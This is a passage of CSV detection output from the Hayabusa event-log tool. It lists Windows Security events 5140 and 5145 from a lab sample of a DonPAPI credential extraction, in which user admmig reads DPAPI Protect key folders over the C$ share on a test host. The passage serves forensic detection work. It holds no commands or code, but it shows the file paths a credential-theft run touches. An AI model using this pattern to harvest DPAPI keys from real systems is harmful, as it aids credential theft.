0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.716 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.716 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1111 | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.716 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1111\1d0d5e15-3dd4-4689-a6c8-b3f4a523f317 | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.732 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.732 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.732 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | 
Path: Users\admmig\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1111\4940c1c2-798b-4291-9cbf-56ba1bc56acd | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.748 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1111\dd10a8dd-2e01-4512-9e4e-0ab8b174b115 | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.750 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.750 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.750 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.750 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.769 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.769 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.769 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.769 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File 
Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.769 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.769 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1234 | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.784 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.784 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.784 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1234\eca8ffbf-fcd6-4e81-a424-36116606541f | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.800 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.802 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.802 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.802 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.802 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18 | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.818 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.818 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.818 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\084aa96d-4fd0-4004-802f-dad10353ce8b | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.833 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.833 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\0f51cf18-7e42-4905-a5e2-4dcd2016ba02 | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.849 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\48f8844f-6a0e-44cc-b4c9-4b6aeb83bdcd | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.849 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share 
Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\5dd255ba-fb23-45a9-8f1c-3efe30e43a08 | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.849 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.865 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\7ac45d37-fa59-41b4-a80a-cb9224e97518 | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.865 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.880 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\85b74294-ac3a-4166-8db9-0eb9596ae80e | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.880 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\cbd1402e-96f2-4c55-a4b3-990c71387659 | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.880 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.880 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.896 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\e1d47273-0077-4091-9c01-88df1f2b8983 | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.896 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.912 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.912 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\0d670005-17c4-4245-8305-54f955fcb04a | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.912 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full 
extraction.evtx +2021-12-12 16:15:59.912 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.927 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\521f9c27-57b0-4cbb-bba2-5155c9b3fdbd | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.927 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.943 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\afe30aef-f67e-4cea-9b91-71318f566140 | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.943 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\System32\Microsoft\Protect\S-1-5-18\User\fd60f910-8888-473c-b62a-b304e884cfef | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.943 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.943 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.958 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\ff8d1c3a-73ac-4d33-b09f-51dcf8ae55ef | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.958 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.977 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.978 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-20 | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.982 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.982 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.982 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: 
